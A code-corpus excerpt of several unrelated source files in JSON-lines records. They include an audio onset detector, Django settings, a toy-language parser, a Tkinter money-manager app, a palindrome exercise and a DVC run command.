CPU local test: \" + cpudockercmd + \"\\n\")\n print(\"CMD Used for deploying:\")\n print(pycmd)\n print(\"CMD for CPU local test:\")\n print(cpudockercmd)\n\n if self.accelerator == \"gpu\":\n gpudockercmd = \"sudo nvidia-docker run -it -v \" + \\\n self.baseimageTool.conf_params[\"test_data_path\"] + \":\" + \"/data/data \" + \\\n \"-v \" + self.baseimageTool.conf_params[\"test_output_path\"] + \":\" + \"/data/output \" + \\\n self.userimage + \" \" + \"/bin/bash -c \" + \\\n \"\\\"cd /data && /usr/bin/python \" + pycmd + \" \" + \"--work_dir=/data --data_dir=/data/data --output_dir=/data/output --log_dir=/data/output/log\\\"\"\n f.write(\"CMD for GPU local test: \" + gpudockercmd + \"\\n\")\n print(\"CMD for GPU local test:\")\n print(gpudockercmd)\n print(\"You can check these cmd later in file:\" + DOCKER_RUN_CMD_FILE)\n f.close()\n\n def pack(self):\n self._load_args()\n self._get_baseimage()\n # self._bulid_userimage()\n # self._push_userimage()\n # self._gen_run_cmd()","sub_path":"uaitrain/pack/base_pack_tool.py","file_name":"base_pack_tool.py","file_ext":"py","file_size_in_byte":8596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"106506238","text":"import numpy as np\nfrom feature import log_melspectrogram\nimport os\nimport torch\nfrom model import convnet1\nimport librosa\nimport sys\n\nMAX_NOTE_NUM=sys.maxsize\n\nsample_rate = 44100\nn_mels = 128\ntime_win_size = 9\n\npeak_threshold = 0.008\nshortest_note = 5 #最短音符帧长\n\ndef onset_predict(model_name, threshold=peak_threshold):\n\n model = convnet1()\n model.load_state_dict(torch.load(model_name))\n dir = './data_test'\n predict_dir = './onset_predict'\n ground_truth = '../ground_truth'\n if not os.path.exists(predict_dir):\n os.mkdir(predict_dir)\n\n for list in os.listdir(dir):\n path = os.path.join(dir, list)\n feature = log_melspectrogram(path, sample_rate=sample_rate, n_mels=n_mels)[:64]\n duration = librosa.get_duration(filename=path)\n time_unit = duration / len(feature[0])\n output = []\n for i in range(int(time_win_size / 2)):\n output.append(0)\n for i in range(len(feature[0]) - time_win_size):\n X = torch.tensor(feature[:, i: i + time_win_size], dtype=torch.float).view(1, 1, 64, 9)\n y = model(X, istraining=False).squeeze()\n output.append(y.item())\n valid_index = peak_pick(output, threshold)\n predict = [(valid_index[i] + 0.5) * time_unit for i in range(len(valid_index))]\n with open(os.path.join(predict_dir, list.split('.')[0] + '.txt'), 'w') as f:\n for p in predict:\n f.write(str(p) + '\\n')\n f.close()\n\ndef peak_pick(output, threshold=peak_threshold):\n valid_peak = []\n for i in range(1, len(output) - 1):\n if(output[i] >= output[i - 1] and output[i] >= output[i + 1]) and output[i] > threshold:\n valid_peak.append(i)\n constant = []\n onset = []\n valid_peak.append(MAX_NOTE_NUM)\n for i in range(len(valid_peak) - 1):\n if valid_peak[i + 1] - valid_peak[i] < shortest_note:\n constant.append(valid_peak[i])\n else:\n if constant != []:\n constant.append(valid_peak[i])\n onset.append(constant[int(len(constant) / 2)])\n constant = []\n else:\n onset.append(valid_peak[i])\n\n return onset\n\n\n","sub_path":"onset_predict.py","file_name":"onset_predict.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12726347","text":"from projectname.configs.common.settings import *\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\nPROJECT_DOMAIN = \"http://autocms.com\"\n\n# Database\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'autocms',\n 'USER': 'postgres',\n 'PASSWORD': 'postgres',\n }\n}\n\nADMINS = (('Raw Jam Dev', 'dev@rawjam.co.uk')),\nMANAGERS = ('Raw Jam Dev', 'dev@rawjam.co.uk'),\n\nALLOWED_HOSTS = [\n '.autocms.com',\n]\n\nPIPELINE_ENABLED = not DEBUG\nPIPELINE_CSS = {\n\t'theme': {\n\t\t'source_filenames': (\n\t\t\t'css/chosen.css',\n\t\t\t'less/theme.less' if not DEBUG else ''\n\t\t),\n\t\t'output_filename': 'css/theme.min.css',\n\t\t'variant': 'datauri'\n\t},\n}\n","sub_path":"rawjam/skeleton_projects/cms/projectname/configs/production/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157725531","text":"'''\nCreated on Nov 25, 2011\n\n@author: fab\n'''\n\nfrom LexicalAnalyzers import LexicalAnalyzer\nfrom Memory import Mem\nfrom ParserExceptions import ParserException\nfrom Operands import Operand\nfrom Ids import Id\nfrom StatementLists import StatementList\nfrom Statements import Statement\nfrom Constants import Constant\nfrom ArithmeticExpressions import ArithmeticExpression\nfrom PrintStatements import PrintStatement\nfrom AssignmentStatements import AssignmentStatement\nfrom UnaryExpressions import UnaryExpression\nfrom AddExpressions import AddExpression\nfrom SubExpressions import SubExpression\nfrom MulExpressions import MulExpression\nfrom DivExpressions import DivExpression\nfrom WhileStatements import WhileStatement\nfrom IfStatements import IfStatement\nfrom EQExpressions import EQExpression\nfrom NEExpressions import NEExpression\nfrom LTExpressions import LTExpression\nfrom LEExpressions import LEExpression\nfrom GTExpressions import GTExpression\nfrom GEExpressions import GEExpression\n\nclass Parser(object):\n \n lex = object\n progName = object\n mem = object\n \n def __init__(self, sourceCode, mem):\n self.lex = LexicalAnalyzer(sourceCode)\n self.mem = mem\n \n def getProgName(self):\n return self.progName\n \n def parse(self):\n token = self.getToken()\n \n return 'not implemented yet'\n '''\n String token = getToken ();\n if (!token.equalsIgnoreCase(\"program\") )\n throw new ParserException (\"reserved word program expected\");\n token = lex.getNextToken();\n if (!isValidId (token))\n throw new ParserException (\"id expected\");\n progName = token;\n token = lex.getNextToken();\n if (!token.equalsIgnoreCase(\"is\"))\n throw new ParserException (\"reserved word is expected\");\n token = lex.getNextToken();\n if (!token.equalsIgnoreCase(\"begin\"))\n throw new ParserException (\"reserved word begin expected\");\n StatementList stmts= getStatementList();\n token = lex.getNextToken();\n if (!token.equalsIgnoreCase(\"end\"))\n throw new ParserException (\"reserved word end expected\");\n if (lex.moreTokens())\n throw new ParserException (\"garbage at end of program\");\n return new Program (stmts);\n '''\n \n def getStatementList(self):\n list = StatementList()\n stmt = self.getStatement()\n list.addStatement(stmt)\n token = self.lex.getNextToken()\n while self.isValidStatementStart(token):\n self.lex.returnToken(token)\n stmt = self.getStatement()\n list.addStatement(stmt)\n token = self.lex.getNextToken()\n self.lex.returnToken(token)\n return list\n \n def isValidStatementStart(self, token):\n return token.equals('if') | token.equals('while') | self.isValidId(token) | token.equals('print')\n \n def getStatement(self):\n stmt = object\n token = self.lex.getNextToken()\n if token.equals('if'):\n stmt = self.getIfStatement()\n elif token.equals('while'):\n stmt = self.getWhileStatement()\n elif token.equals('print'):\n stmt = self.getPrintStatement()\n else:\n raise ParserException('statement expected')\n return stmt\n \n def getPrintStatement(self):\n token = self.lex.getNextToken()\n if not self.isValidId(token):\n raise ParserException('identifier expected')\n var = Id(token, self.mem)\n return PrintStatement(var)\n \n def getAssignmentStatement(self, tok):\n var = Id(tok, self.mem)\n token = self.lex.getNextToken()\n if not token.equals(':='):\n raise ParserException (':= expected')\n expr = self.getArithmeticExpression()\n return AssignmentStatement(var, expr, self.mem)\n \n def getArithmeticExpression(self):\n expr = object\n op1 = self.getOperand()\n token = self.lex.getNextToken()\n if not self.isArithmeticOp(token):\n self.lex.returnToken(token)\n expr = UnaryExpression(op1)\n else:\n op2 = self.getOperand()\n if token.equals('+'):\n expr = AddExpression(op1, op2)\n elif token.equals('-'):\n expr = SubExpression(op1, op2)\n elif token.equals('*'):\n expr = MulExpression(op1, op2)\n else:\n expr = DivExpression(op1, op2)\n return expr\n \n def getOperand(self):\n op = object\n token = self.lex.getNextToken()\n if self.isValidId(token):\n op = Id(token, self.mem)\n elif self.isValidConstant(token):\n op = Constant(token)\n else:\n raise ParserException('operand expected')\n return op\n \n def isValidConstant(self, token):\n value = 0\n try:\n value = token\n except ValueError:\n raise ParserException('invalid constant')\n return True\n \n def isArithmeticOp(self, token):\n return token.equals('+') | token.equals('-') | token.equals('*') | token.equals('/')\n \n def getWhileStatement(self):\n expr = self.getBooleanExpression()\n token = self.lex.getNextToken()\n if not token.equals('loop'):\n raise ParserException('reserved word loop expected')\n list = self.getStatementList()\n token = self.lex.getNextToken()\n if not token.equals('end'):\n raise ('reserved word end expected')\n return WhileStatement(expr, list)\n \n def getIfStatement(self):\n expr = self.getBooleanExpression()\n token = self.lex.getNextToken()\n if not token.equals('then'):\n raise ParserException('reserved word then expected')\n first = self.getStatementList()\n token = self.lex.getNextToken()\n if not token.equals('else'):\n raise ParserException ('reserved word else expected')\n second = self.getStatementList()\n token = self.lex.getNextToken()\n if not token.equals('end'):\n raise ParserException('reserved word end expected')\n return IfStatement(expr, first, second)\n \n def getBooleanExpression(self):\n expr = object\n op1 = self.getOperand()\n token = self.lex.getNextToken()\n if not self.isValidRelativeOp(token):\n raise ParserException('relative operator expected')\n op2 = self.getOperand()\n if token.equals('='):\n expr = EQExpression(op1, op2)\n elif token.equals('/='):\n expr = NEExpression(op1, op2)\n elif token.equals('<'):\n expr = LTExpression(op1, op2)\n elif token.equals('<='):\n expr = LEExpression(op1, op2)\n elif token.equals('>'):\n expr = GTExpression(op1, op2)\n else:\n expr = GEExpression(op1, op2)\n return expr\n \n def isValidRelativeOp(self, token):\n return token.equals('=') | token.equals('/=') | token.equals('<') | token.equals('<=') | token.equals('>') | token.equals('>=')\n \n def isValidId(self, token):\n str = token.charAt(0)\n return token.length == 1 & str.isLetter()\n \n def getToken(self):\n if not self.lex.moreTokens():\n raise ParserException('illegal end of program')\n return self.lex.getNextToken()","sub_path":"Parsers.py","file_name":"Parsers.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"125456855","text":"import tkinter as tk\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom pylab import plot, show, xlabel, ylabel\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom matplotlib.figure import Figure\r\nfrom collections import defaultdict\r\nfrom pprint import pprint\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom moneymanager import MoneyManager\r\n\r\nwin = tk.Tk()\r\n\r\n#Set window size here to '540 x 640'\r\nwin.geometry('540x640+700+200')\r\n\r\n#Set the window title to ' Money Manager'\r\nwin.title(' Money Management System')\r\n\r\n#The user number and associated variable\r\nuser_number_var = tk.StringVar()\r\nuser_number_var.set('123456')\r\nuser_number_entry = tk.Entry(win, textvariable=user_number_var)\r\nuser_number_entry.focus_set()\r\n\r\n#The pin number entry and associated variables\r\n#Modify the following to display a series of * rather than the pin ie **** not 1234\r\npin_number_var = tk.StringVar()\r\npin_number_var.set('7890')\r\nuser_pin_entry = tk.Entry(win, text='PIN Number', textvariable=pin_number_var, show='*')\r\n\r\n\r\n#set the user file by default to an empty string\r\nuser_file = ''\r\n\r\n# The balance label and associated variable\r\nbalance_var = tk.StringVar()\r\nbalance_var.set('Balance: $0.00')\r\nbalance_label = tk.Label(win, textvariable=balance_var)\r\n\r\n# The Entry widget to accept a numerical value to deposit or withdraw\r\n#amount_var = tk.StringVar()\r\ntkVar=StringVar(win)\r\namount_entry = tk.Entry(win)\r\nentry_type=tk.StringVar()\r\nentry_type.set('food')\r\n\r\n# The transaction text widget holds text of the transactions\r\ntransaction_text_widget = tk.Text(win, height=10, width=48)\r\n\r\n# The money manager object we will work with\r\nuser = MoneyManager()\r\n\r\n# ---------- Button Handlers for Login Screen ----------\r\n\r\ndef clear_pin_entry():\r\n '''Function to clear the PIN number entry when the Clear / Cancel button is clicked.''' \r\n # Clear the pin number entry here\r\n pin_number_var.set(\"\")\r\n\r\ndef handle_pin_button(event=None):\r\n '''Function to add the number of the button clicked to the PIN number entry.''' \r\n\r\n input = event.widget[\"text\"]\r\n pin = pin_number_var.get()\r\n new_pin = pin+str(input)\r\n\r\n # Limit to 4 chars in length\r\n if len(new_pin) > 4:\r\n return messagebox.showerror(\"Error\", \"pin number should be four digits only!\")\r\n\r\n # Set the new pin number on the pin_number_var\r\n pin_number_var.set(new_pin)\r\n\r\ndef log_in(event=None):\r\n '''Function to log in to the banking system using a known user number and PIN.'''\r\n global user\r\n global pin_number_var\r\n global user_number_var\r\n global user_file\r\n global user_num_entry\r\n\r\n # Create the filename from the entered account number with '.txt' on the end\r\n file_name = user_number_var.get() + \".txt\"\r\n\r\n # Try to open the account file for reading\r\n try:\r\n\r\n # Open the account file for reading\r\n user_file = open(file_name, 'r')\r\n file_data = user_file.read().split('\\n')\r\n\r\n # First line is account number\r\n if file_data[0] == user_number_var.get():\r\n user.user_number = file_data[0]\r\n else:\r\n raise Exception(\"Invalid user number\")\r\n\r\n # Second line is PIN number, raise exceptionk if the PIN entered doesn't match account PIN read \r\n if file_data[1] == pin_number_var.get():\r\n user.pin_number = file_data[1]\r\n else:\r\n raise Exception(\"Invalid pin number\")\r\n\r\n # Read third and fourth lines (balance and interest rate) \r\n user.balance = file_data[2]\r\n balance_var.set('Balance: ' + str(user.balance))\r\n\r\n # Section to read account transactions from file - start an infinite 'do-while' loop here\r\n\r\n # Attempt to read a line from the account file, break if we've hit the end of the file. If we\r\n # read a line then it's the transaction type, so read the next line which will be the transaction amount.\r\n # and then create a tuple from both lines and add it to the account's transaction_list \r\n user_file.seek(0, 0)\r\n\r\n while True:\r\n line = read_line_from_user_file()\r\n if not line:\r\n break\r\n \"\"\" detect only transaction lines \"\"\"\r\n if line.startswith(\"Deposit\") or line in ['food', 'rent', 'bills', 'entertainment', 'other']:\r\n amount = read_line_from_user_file()\r\n user.transaction_list.append((line, amount))\r\n\r\n # Close the file now we're finished with it\r\n user_file.close()\r\n\r\n\r\n # Catch exception if we couldn't open the file or PIN entered did not match account PIN\r\n except Exception as errorMsg:\r\n if \"No such file or directory\" in str(errorMsg):\r\n errorMsg = \"Invalid user number - please try again!\"\r\n\r\n # Show error messagebox and & reset BankAccount object to default...\r\n messagebox.showerror(\"Error\", errorMsg)\r\n user = MoneyManager()\r\n\r\n # ...also clear PIN entry and change focus to account number entry\r\n clear_pin_entry()\r\n user_number_entry.focus_set()\r\n return\r\n # Got here without raising an exception? Then we can log in - so remove the widgets and display the account screen\r\n remove_all_widgets()\r\n create_user_screen()\r\n\r\n\r\n# ---------- Button Handlers for User Screen ----------\r\n\r\ndef save_and_log_out():\r\n '''Function to overwrite the user file with the current state of\r\n the user object (i.e. including any new transactions), remove\r\n all widgets and display the login screen.'''\r\n global user\r\n\r\n # Save the account with any new transactions\r\n user.save_to_file()\r\n\r\n # Reset the bank acount object\r\n user = MoneyManager()\r\n\r\n # Reset the account number and pin to blank\r\n clear_pin_entry()\r\n user_number_var.set('')\r\n user_number_entry.focus_set()\r\n\r\n # Remove all widgets and display the login screen again\r\n remove_all_widgets()\r\n create_login_screen()\r\n\r\ndef perform_deposit():\r\n '''Function to add a deposit for the amount in the amount entry to the\r\n user's transaction list.'''\r\n global user\r\n global amount_entry\r\n global balance_label\r\n global balance_var\r\n\r\n\r\n # Try to increase the account balance and append the deposit to the account file\r\n try:\r\n\r\n # Get the cash amount to deposit. Note: We check legality inside account's deposit method\r\n amount_to_deposit = amount_entry.get()\r\n\r\n # Deposit funds\r\n deposit_funds_msg = user.deposit_funds(amount_to_deposit)\r\n\r\n if deposit_funds_msg != \"Deposit Successful\":\r\n raise Exception(deposit_funds_msg)\r\n\r\n # Update the transaction widget with the new transaction by calling account.get_transaction_string()\r\n # Note: Configure the text widget to be state='normal' first, then delete contents, then instert new\r\n # contents, and finally configure back to state='disabled' so it cannot be user edited.\r\n transaction_text_widget['state'] = 'normal'\r\n transaction_text_widget.delete(0.0, tk.END)\r\n transaction_text_widget.insert(tk.END, user.get_transaction_string())\r\n transaction_text_widget['state'] = 'disabled'\r\n\r\n # Change the balance label to reflect the new balance\r\n balance_var.set('Balance: ' + str(user.balance))\r\n\r\n # Clear the amount entry\r\n amount_entry.delete(0, 'end')\r\n\r\n # Update the interest graph with our new balance\r\n plot_spending_graph()\r\n\r\n # Catch and display exception as a 'showerror' messagebox with a title of 'Transaction Error' and the text of the exception\r\n except Exception as errorMsg:\r\n return messagebox.showerror(\"Transaction Error\", errorMsg)\r\n\r\ndef perform_transaction():\r\n '''Function to add the entry the amount in the amount entry from the user balance and add an entry to the transaction list.'''\r\n global user\r\n global amount_entry\r\n global balance_label\r\n global balance_var\r\n global entry_type\r\n\r\n # Try to decrease the account balance and append the deposit to the account file\r\n try:\r\n # Get the cash amount to use. Note: We check legality inside account's withdraw_funds method\r\n amount_to_use = amount_entry.get()\r\n\r\n # Get the type of entry that will be added ie rent etc\r\n type_of_entry = entry_type.get()\r\n\r\n # Withdraw funds from the balance\r\n withdraw_funds_msg = user.add_entry(amount_to_use, str(type_of_entry))\r\n\r\n if withdraw_funds_msg != \"Entry Successful\":\r\n raise Exception(withdraw_funds_msg)\r\n\r\n # Update the transaction widget with the new transaction by calling user.get_transaction_string()\r\n # Note: Configure the text widget to be state='normal' first, then delete contents, then instert new\r\n # contents, and finally configure back to state='disabled' so it cannot be user edited.\r\n transaction_text_widget['state'] = 'normal'\r\n transaction_text_widget.delete(0.0, tk.END)\r\n transaction_text_widget.insert(tk.END, user.get_transaction_string())\r\n transaction_text_widget['state'] = 'disabled'\r\n\r\n # Change the balance label to reflect the new balance\r\n balance_var.set('Balance: ' + str(user.balance))\r\n\r\n # Clear the amount entry\r\n amount_entry.delete(0, 'end')\r\n\r\n # Update the graph\r\n plot_spending_graph()\r\n\r\n # Catch and display any returned exception as a messagebox 'showerror'\r\n except Exception as errorMsg:\r\n return messagebox.showerror(\"Transaction Error\", errorMsg)\r\n\r\ndef remove_all_widgets():\r\n '''Function to remove all the widgets from the window.'''\r\n global win\r\n for widget in win.winfo_children():\r\n widget.grid_remove()\r\n\r\ndef read_line_from_user_file():\r\n '''Function to read a line from the users file but not the last newline character.\r\n Note: The user_file must be open to read from for this function to succeed.'''\r\n global user_file\r\n return user_file.readline()[0:-1]\r\n\r\ndef plot_spending_graph():\r\n '''Function to plot the user spending here.'''\r\n # YOUR CODE to generate the x and y lists here which will be plotted\r\n x = []\r\n y = []\r\n for data in user.transaction_list:\r\n a,b = data\r\n x.append(a)\r\n y.append(float(b))\r\n\r\n #Your code to display the graph on the screen here - do this last\r\n figure = Figure(figsize=(5, 2), dpi=100)\r\n canvas = FigureCanvasTkAgg(figure, master=win)\r\n canvas.get_tk_widget().grid(row=5, column=0, columnspan=5, sticky='nsew')\r\n figure.suptitle('User Spending Graph')\r\n\r\n a = figure.gca()\r\n a.bar(x, y)\r\n a.set_ylabel('Amount($)', fontsize=10)\r\n canvas.draw()\r\n\r\n\r\n \r\n# ---------- UI Drawing Functions ----------\r\n\r\ndef create_login_screen():\r\n '''Function to create the login screen.''' \r\n \r\n\r\n # ----- Row 0 -----\r\n\r\n # 'FedUni Money Manager' label here. Font size is 28.\r\n tk.Label(win, text=\" Money Manager\", fg=\"black\", font=\"none 32\").grid(row=0, column=0, columnspan=3, sticky='nsew')\r\n\r\n # ----- Row 1 -----\r\n\r\n # User Number / Pin label here\r\n tk.Label(win, text=\"User Number/PIN\", height=4, width=20\r\n ).grid(row=1, column=0, sticky=\"nsew\")\r\n\r\n # User number entry here\r\n user_number_entry.grid(row=1, column=1, sticky=\"nsew\")\r\n\r\n # User pin entry here\r\n user_pin_entry.grid(row=1, column=2, sticky=\"nsew\")\r\n \r\n \r\n\r\n # ----- Row 2 -----\r\n\r\n # Buttons 1, 2 and 3 here. Buttons are bound to 'handle_pin_button' function via '' event.\r\n button_1 = tk.Button(win, text=\"1\")\r\n button_1.grid(row=2, column=0, sticky=\"nsew\")\r\n button_1.bind(\"\", handle_pin_button)\r\n\r\n button_2 = tk.Button(win, text=\"2\")\r\n button_2.grid(row=2, column=1, sticky=\"nsew\")\r\n button_2.bind(\"\", handle_pin_button)\r\n\r\n button_3 = tk.Button(win, text=\"3\")\r\n button_3.grid(row=2, column=2, sticky=\"nsew\")\r\n button_3.bind(\"\", handle_pin_button)\r\n\r\n # ----- Row 3 -----\r\n\r\n # Buttons 4, 5 and 6 here. Buttons are bound to 'handle_pin_button' function via '' event.\r\n button_4 = tk.Button(win, text=\"4\")\r\n button_4.grid(row=3, column=0, sticky=\"nsew\")\r\n button_4.bind(\"\", handle_pin_button)\r\n\r\n button_5 = tk.Button(win, text=\"5\")\r\n button_5.grid(row=3, column=1, sticky=\"nsew\")\r\n button_5.bind(\"\", handle_pin_button)\r\n\r\n button_6 = tk.Button(win, text=\"6\")\r\n button_6.grid(row=3, column=2, sticky=\"nsew\")\r\n button_6.bind(\"\", handle_pin_button)\r\n\r\n # ----- Row 4 -----\r\n\r\n # Buttons 7, 8 and 9 here. Buttons are bound to 'handle_pin_button' function via '' event.\r\n button_7 = tk.Button(win, text=\"7\")\r\n button_7.grid(row=4, column=0, sticky=\"nsew\")\r\n button_7.bind(\"\", handle_pin_button)\r\n\r\n button_8 = tk.Button(win, text=\"8\")\r\n button_8.grid(row=4, column=1, sticky=\"nsew\")\r\n button_8.bind(\"\", handle_pin_button)\r\n\r\n button_9 = tk.Button(win, text=\"9\")\r\n button_9.grid(row=4, column=2, sticky=\"nsew\")\r\n button_9.bind(\"\", handle_pin_button)\r\n\r\n # ----- Row 5 -----\r\n\r\n # Cancel/Clear button here. 'bg' and 'activebackground' should be 'red'. But calls 'clear_pin_entry' function.\r\n tk.Button(win, text=\"Cancel/Clear\", bg=\"red\",activebackground=\"red\", command=clear_pin_entry).grid(row=5, column=0, sticky=\"nsew\")\r\n\r\n # Button 0 here\r\n button_0 = tk.Button(win, text=\"0\")\r\n button_0.grid(row=5, column=1, sticky=\"nsew\")\r\n button_0.bind(\"\", handle_pin_button)\r\n\r\n # Login button here. 'bg' and 'activebackground' should be 'green'). Button calls 'log_in' function.\r\n tk.Button(win, text=\"Login\", bg=\"green\",activebackground=\"green\", command=log_in).grid(row=5, column=2, sticky=\"nsew\")\r\n\r\n # ----- Set column & row weights -----\r\n\r\n # Set column and row weights. There are 5 columns and 6 rows (0..4 and 0..5 respectively)\r\n win.columnconfigure(0, weight=1)\r\n win.columnconfigure(1, weight=1)\r\n win.columnconfigure(2, weight=1)\r\n win.columnconfigure(3, weight=1)\r\n win.rowconfigure(0, weight=1)\r\n win.rowconfigure(2, weight=1)\r\n win.rowconfigure(3, weight=1)\r\n win.rowconfigure(4, weight=1)\r\n win.rowconfigure(5, weight=1)\r\n\r\ndef create_user_screen():\r\n '''Function to create the user screen.'''\r\n global amount_text\r\n global amount_label\r\n global transaction_text_widget\r\n global balance_var\r\n global entry_type\r\n \r\n # ----- Row 0 -----\r\n\r\n # FedUni Money Manager label here. Font size should be 22.\r\n tk.Label(win, text=\" Money Manager\", font=\"none 22\").grid(row=0, column=0, sticky='nsew', columnspan=4)\r\n\r\n # ----- Row 1 -----\r\n\r\n # User number label here\r\n user_label = \"User Number: \"+str(user_number_var.get())\r\n tk.Label(win, text=user_label, height=4, width=28).grid(row=1, column=0, sticky='nsew')\r\n\r\n # Balance label here\r\n balance_label.grid(row=1, column=1, sticky='nsew')\r\n\r\n # Log out button here\r\n tk.Button(win, text=\"Log Out\", command=save_and_log_out).grid(row=1, column=2, sticky=\"nsew\", columnspan=2)\r\n\r\n # ----- Row 2 -----\r\n\r\n # Amount label here\r\n tk.Label(win, text=\"Amount($)\").grid(row=2, column=0, sticky='nsew')\r\n\r\n # Amount entry here\r\n amount_entry.grid(row=2, column=1, sticky='nsew')\r\n\r\n # Deposit button here\r\n tk.Button(win, text=\"Deposit\", command=perform_deposit, width=12).grid(row=2, column=2, sticky=\"nsew\")\r\n\r\n # NOTE: Bind Deposit and Withdraw buttons via the command attribute to the relevant deposit and withdraw\r\n # functions in this file. If we \"BIND\" these buttons then the button being pressed keeps looking as\r\n # if it is still pressed if an exception is raised during the deposit or withdraw operation, which is\r\n # offputting.\r\n \r\n \r\n # ----- Row 3 -----\r\n # Entry type label here\r\n tk.Label(win, text=\"Entry Type\").grid(row=3, column=0, sticky='nsew')\r\n\r\n # Entry drop list here\r\n l = ['food', 'rent', 'bills', 'entertainment', 'other']\r\n drop = tk.OptionMenu(win,entry_type, *l)\r\n drop.grid(row=3, column=1, sticky=\"nsew\")\r\n\r\n # Add entry button here\r\n tk.Button(win, text=\"Add Entry\", command=perform_transaction, width=12).grid(row=3, column=2, sticky=\"nsew\")\r\n\r\n # ----- Row 4 -----\r\n\r\n # Declare scrollbar (text_scrollbar) here (BEFORE transaction text widget)\r\n text_scrollbar = tk.Scrollbar(win)\r\n text_scrollbar.grid(row=4, column=1, columnspan=5, sticky='nse')\r\n\r\n # Add transaction Text widget and configure to be in 'disabled' mode so it cannot be edited.\r\n # Note: Set the yscrollcommand to be 'text_scrollbar.set' here so that it actually scrolls the Text widget\r\n # Note: When updating the transaction text widget it must be set back to 'normal mode' (i.e. state='normal') for it to be edited\r\n transaction_text_widget['wrap'] = tk.NONE\r\n transaction_text_widget['bd'] = 0\r\n transaction_text_widget['state'] = 'disabled'\r\n transaction_text_widget['yscrollcommand'] = text_scrollbar.set\r\n transaction_text_widget.grid(row=4, column=0, columnspan=5, sticky='nsew')\r\n\r\n # Now add the scrollbar and set it to change with the yview of the text widget\r\n text_scrollbar.config(command=transaction_text_widget.yview)\r\n\r\n transaction_text_widget['state'] = 'normal'\r\n transaction_text_widget.delete(0.0, tk.END)\r\n transaction_text_widget.insert(tk.END, user.get_transaction_string())\r\n transaction_text_widget['state'] = 'disabled'\r\n # ----- Row 5 - Graph -----\r\n\r\n # Call plot_interest_graph() here to display the graph\r\n plot_spending_graph()\r\n\r\n # ----- Set column & row weights -----\r\n\r\n # Set column and row weights here - there are 6 rows and 5 columns (numbered 0 through 4 not 1 through 5!)\r\n win.columnconfigure(0, weight=1)\r\n win.columnconfigure(1, weight=1)\r\n win.columnconfigure(2, weight=1)\r\n win.columnconfigure(3, weight=1)\r\n win.rowconfigure(0, weight=1)\r\n win.rowconfigure(2, weight=1)\r\n win.rowconfigure(3, weight=1)\r\n win.rowconfigure(4, weight=1)\r\n win.rowconfigure(5, weight=1)\r\n\r\n\r\n\r\n# ---------- Display Login Screen & Start Main loop ----------\r\n\r\ncreate_login_screen()\r\nwin.mainloop()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95140041","text":"# 6.3\n\ndef main():\n test = testPalidrone\n print(testPalidrone)\n\ndef reverse(n):\n \"\"\"\n takes in a single number\n converts number to a string\n return reverse the string\n \"\"\"\n n_converted = str(n)\n reverse_num = \"\"\n\n for num in n_converted[::-1]:\n reverse_num = reverse_num + num\n\n return reverse_num\n\n\ndef isPalidrone(n):\n \"\"\"\n compare the number that is passed in to the function call of reverse\n return true or false\n \"\"\"\n\n # compare the two strings to one another\n if str(n) == reverse(n):\n return True\n else:\n return False\n\ndef testPalidrone():\n \"\"\"\n User input\n return: true or false depending on if user input palidrone\n \"\"\"\n\n flag = True\n while flag == True:\n try:\n user_input = int(input((\"Enter a number to check if it is a palidrone: \")))\n\n return isPalidrone(user_input)\n\n flag = False\n\n except ValueError as e:\n print(\"Please insert only 1 integer\")\n print(e)\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"fanonxr@bu.edu_hw_6.3.py","file_name":"fanonxr@bu.edu_hw_6.3.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165629988","text":"import os\n\nfrom dvc.command.common.base import CmdBase\nfrom dvc.data_cloud import file_md5\nfrom dvc.exceptions import DvcException\nfrom dvc.logger import Logger\nfrom dvc.state_file import StateFile\nfrom dvc.executor import Executor\n\n\nclass RunError(DvcException):\n def __init__(self, msg):\n DvcException.__init__(self, 'Run error: {}'.format(msg))\n\n\nclass CmdRun(CmdBase):\n def __init__(self, settings):\n super(CmdRun, self).__init__(settings)\n\n def run(self):\n cmd = ' '.join(self.parsed_args.command)\n state = StateFile(data_item=None,\n cmd=cmd,\n out=self.parsed_args.out,\n out_git=self.parsed_args.out_git,\n deps=self.parsed_args.deps,\n locked=self.parsed_args.lock,\n md5=None)\n\n self.run_command(self.settings, state)\n return self.commit_if_needed('DVC run: {}'.format(state.cmd))\n\n @staticmethod\n def run_command(settings, state):\n Executor.exec_cmd_only_success(state.cmd, shell=True)\n\n CmdRun.apply_to_files(state.out, state, CmdRun._create_cache_and_state_files, settings)\n CmdRun.apply_to_files(state.out_git, state, CmdRun._create_state_file, settings)\n\n @staticmethod\n def apply_to_files(files, state, func, settings):\n items = settings.path_factory.to_data_items(files)[0]\n [func(i, state, settings) for i in items]\n\n @staticmethod\n def _create_cache_and_state_files(data_item, state, settings):\n Logger.debug('Move output file \"{}\" to cache dir \"{}\" and create a hardlink'.format(\n data_item.data.relative, data_item.cache_dir_abs))\n data_item.move_data_to_cache()\n return CmdRun._create_state_file(data_item, state, settings, cache_file_exists = True)\n\n @staticmethod\n def _create_state_file(data_item, state, settings, cache_file_exists=False):\n Logger.debug('Create state file \"{}\"'.format(data_item.state.relative))\n\n if cache_file_exists:\n md5 = os.path.basename(data_item.cache.relative)\n else:\n md5 = file_md5(data_item.data.relative)[0]\n\n state_file = StateFile(data_item,\n state.cmd,\n state.out,\n state.out_git,\n locked=state.locked,\n deps=StateFile.parse_deps_state(settings, state.deps),\n md5=md5)\n state_file.save()\n return 